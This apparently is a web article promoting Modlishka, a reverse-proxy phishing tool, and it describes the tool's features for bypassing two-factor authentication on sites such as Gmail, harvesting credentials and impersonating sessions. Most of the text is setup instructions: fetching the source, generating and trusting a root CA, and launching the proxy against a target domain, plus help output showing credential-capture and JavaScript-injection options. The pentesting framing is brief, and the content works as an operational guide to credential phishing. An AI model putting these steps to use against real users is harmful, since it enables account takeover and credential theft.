Modlishka is a very powerful Reverse Proxy tool that allows you to run phishing campaigns. It can be very useful to all pentesters since Modlishka is able to show current 2FA weaknesses (bypass 2FA protection on popular websites: Gmail, Yahoo, etc.) and help you find and implement adequate security solutions.
Modlishka: Powerful Reverse Proxy, Phishing NG, Bypassing 2FA
Modlishka is written in
Go and it allows you to carry out an effective phishing campaign. In addition, according to the official docu, you can adjust the configuration for your chosen domain. This reverse proxy tool can be easily customized through a set of available command line options or JSON configuration files.
Modlishka tool is able to trick 2FA systems by collectiing 2FA tokens, without using fake templates (you just need to point to the target domain). To start pentesting/ phishing with Modlishka, all you need is TLS certificate and phishing domain.
- Support for majority of 2FA authentication schemes (by design).
- No website templates (just point Modlishka to the target domain – in most cases, it will be handled automatically).
- Full control of “cross” origin TLS traffic flow from your victims browsers (through custom new techniques).
- Flexible and easily configurable phishing scenarios through configuration options.
- Striping website from all encryption and security headers (back to 90’s MITM style).
- User credential harvesting (with context based on URL parameter passed identifiers).
- Can be extended with your ideas through plugins.
- Stateless design. Can be scaled up easily for an arbitrary number of users – ex. through a DNS load balancer.
- Web panel with a summary of collected credentials and user session impersonation (beta).
- Backdoor free.
Prerequisites (to run an effective phishing campaign):
- Registered domain name
- Wildcard SSL certificate
First of all, you need to fetch the source code with
$ go get -u github.com/drk1wi/Modlishka
Then configure the
$ openssl genrsa -out MyRootCA.key 2048` $ openssl req -x509 -new -nodes -key MyRootCA.key -sha256 -days 1024 -out MyRootCA.pem
- Replace the const
CA_CERTvariable with the content of
MyRootCA.pemfile and const
CA_CERT_KEYwith the content of
- Install and set the right trust level for the ‘MyRootCA’ (MyRootCA.pem file) CA in your browsers certificate store (Firefox, Chrome).
Finally, compile and launch:
$ make $ sudo ./dist/proxy -config templates/google.com_gsuite.json
To list available options, simply use
./dist/proxy -h Usage of ./dist/proxy: -cert string base64 encoded TLS certificate -certKey string base64 encoded TLS certificate key -certPool string base64 encoded Certification Authority certificate -config string JSON configuration file. Convenient instead of using command line switches. -credParams string Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex) -debug Print debug information -disableSecurity Disable security features like anti-SSRF. Disable at your own risk. -jsRules string Comma separated list of URL patterns and JS base64 encoded payloads that will be injected. -listeningAddress string Listening address (default "127.0.0.1") -listeningPort string Listening port (default "443") -log string Local file to which fetched requests will be written (appended) -phishing string Phishing domain to create - Ex.: target.co ...
$ sudo ./dist/proxy -target https://target-domain.com -phishingDomain loopback.modlishka.io -listeningPort 80
The following command will launch the proxy without any encryption:
Targetparameter : the domain that should be proxied,
phishingDomain: defines the phishing domain.
DEMO: Phishing with Modlishka (author: @drk1wi)
For more detailed usage guide, click on the “documentation” button below.